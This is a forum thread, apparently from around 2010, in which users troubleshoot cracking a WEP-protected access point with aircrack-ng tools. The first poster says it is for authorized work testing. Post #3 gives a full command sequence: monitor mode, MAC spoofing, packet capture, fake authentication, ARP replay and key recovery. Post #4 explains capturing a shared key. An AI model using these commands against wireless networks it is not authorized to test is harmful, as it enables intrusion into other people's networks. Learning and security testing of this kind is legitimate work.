
Thread: WEP Crack Aireplay-ng

  1. #1
    kiloraw (Just burned his ISO)

    WEP Crack Aireplay-ng

    First I must say, wonderful job on the vol. 4. I think going to Ubuntu will be well worth it; it sucks for the gurus right now, but like I said it will be worth it.

    As for my problem:
    At work, trying to crack an AP's WEP. I will have to do this a lot more, since it will be my job to test the security of wireless APs, which will have WPA2. Trying to crack WEP now, for knowledge, and it seems logical. The AP has no clients, and the ESSID is not broadcast. I decided to ask my co-worker what the AP's ESSID was, so that I could troubleshoot whether it was a user error or not.

    Card: 3945 iwl

    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)

    airodump-ng (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    The command above is where I get stuck; the aircrack tutorial says "Do not proceed to the next step until you have the fake authentication running correctly."

    The terminal comes back and states
    Sending Authentication Request (shared) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge
    Attack was unsuccessful
    Then it gives me a list of reasons why it did not work.

    NEVERMIND this post... Figured it out... You have to at least have prior data to crack WEP.
    I read the forum discussion; it really cleared up a lot. I recommend to all future newbs (including myself) to really read the aircrack site.
    Just to make sure, and please someone post if this is true:
    "The tutorials are about the situation when you see no client:
    but to do the fragmentation you need the WEP encrypted data, thus either it is from a previous session or from a nonvisible client, as there is no data obtained from fakeauth. When you read any tutorial, look at the MACs in collected packets used for the frag attack.
    If you have no client connected (wlan or lan) you have no data to collect, thus cannot attack the AP unless you have previously collected data.
    LAN client can send data through wireless when addressing wireless client"
    Last edited by kiloraw; 01-22-2010 at 09:32 PM. Reason: Figured out my own problem...

  2. #2
    Archangel-Amael (Super Moderator)

    Re: WEP Crack Aireplay-ng

    This is not a how-to or tutorial. Please post in the correct section of the forums.

  3. #3

    Re: WEP Crack Aireplay-ng

    Well, I do WEP like this:
        airmon-ng stop wlan0
        airmon-ng start wlan0
        "I'll be using mon0 (it's now in monitor mode)"
        airodump-ng mon0 -w /tmp/WEP --channel (AP channel) --bssid (AP bssid)
        aireplay-ng -1 0 -a (AP bssid) mon0
        aireplay-ng -3 -b (AP bssid) mon0
    Wait until the number in the newest console is over 30000 (the second number)
    Then stop all of these
        aircrack-ng /tmp/WEP-01.cap
    Here is a guide

    Yes, I use the no-clients WEP hack even if there are clients
    Last edited by halfdone; 01-23-2010 at 12:15 PM.

  4. #4

    Re: WEP Crack Aireplay-ng

    You need fake auth with shared key...

    Shared key can be hooked when a client connects to the AP...
    To hook the shared key u can use airodump-ng, and wait until someone connects

    Then u have to fake auth
